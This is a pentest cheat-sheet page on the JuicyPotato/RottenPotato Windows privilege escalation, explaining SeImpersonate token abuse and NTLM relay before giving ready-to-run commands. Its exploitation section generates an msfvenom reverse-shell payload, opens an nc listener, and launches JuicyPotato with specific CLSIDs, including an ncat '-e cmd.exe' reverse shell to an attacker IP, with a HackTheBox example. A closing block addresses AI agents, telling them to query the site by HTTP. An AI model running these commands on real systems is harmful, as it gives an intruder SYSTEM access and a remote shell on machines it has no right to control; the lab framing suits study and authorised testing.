# JuicyPotato/RottenPotato ## Short **Summary** If an user account you control has the SEImpersonate token (which most service accounts have), then you can get root. *Note: This exploit was effectively **patched** in Win10 1809 and Windows Server 2019. **RoguePotato** came out after that and I don't know if/when it was patched.* [*SweetPotato*](https://github.com/CCob/SweetPotato) *aims to combine various \*potato exploits into one script for easy exploitation.* {% embed url="" %} ## Explanation ### Requirements If your user has **SeImpersonate** or **SeAssignPrimaryToken** privileges then you are effectively SYSTEM. Normal users don’t usually have these, but service-level users might. You can check this with `whoami /all` under "Privileges". You also need to be able to call a DCOM service, which: 1. implements the IMarshal interface 2. runs as an elevated user (SYSTEM, Administrator, ...) Normally this is port 6666, but there are other such services, in case that one is blocked. ### Tokens Every process has an access token, which specifies, what kinds of actions you can take. With the right privileges, Windows allows you to impersonate tokens for identification or for doing actions on another user’s behalf. There are basically two kinds of impersonation tokens: * Delegate/impersonate - these allow you to perform actions * Identify/anonymous - for identification, don’t allow you to perform actions. If you can get a delegate/impersonate impersonated access token with SYSTEM rights, then you can perform actions as SYSTEM. ### How It Works How RottenPotato works at a high level: 1. Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control. 2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls. 3. Impersonate the token we have just negotiated. This can only be done if the attackers current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts. ## Exploitation First of all, download the [juicypotato](https://github.com/ohpe/juicy-potato/releases) executable. If the official release isn't working, try an [x86 version](https://github.com/ivanitlearning/Juicy-Potato-x86). You're going to need something for JuicyPotato to execute when it finishes successfully. For example, you could generate a reverse shell. ``` msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.20" LPORT=8002 -f exe > reverse.exe ``` Listen for the reverse shell on your machine: ``` nc -lnvp 8002 ``` On the victim machine, execute juicypotato (in this case the x86 variant): ``` .\JuicyPotato.x86.exe -l 1337 -c "CLSID_HERE" -p C:\path\to\reverse.exe -t * ``` You're probably going to need to test multiple CLSIDs before you get a working one. [Here is a list of CLSIDs to try.](http://ohpe.it/juicy-potato/CLSID/) For example, in the hackthebox "devel" machine, this was the successful exploit (my reverse.exe was in the inetpub/wwwroot directory): ``` .\JuicyPotato.x86.exe -l 1337 -c "{4B635ECB-0887-4015-8CA6-D621362F98D1}" -p C:\inetpub\wwwroot\reverse.exe -t * ``` Alternatively, you can use it with a static ncat.exe file: ``` .\JuicyPotato.x86.exe -l 1337 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\ncat.exe -e cmd.exe 10.10.14.17 8002" -t * ``` ### External Links {% embed url="" %} Technical explanation of RottenPotato, which JuicyPotato is based on {% endembed %} {% embed url="" %} Blackhat technical talk about tokens {% endembed %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://heinosass.gitbook.io/leet-sheet/post-exploitation/untitled/windows-privilege-escalation/juicypotato-rottenpotato.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.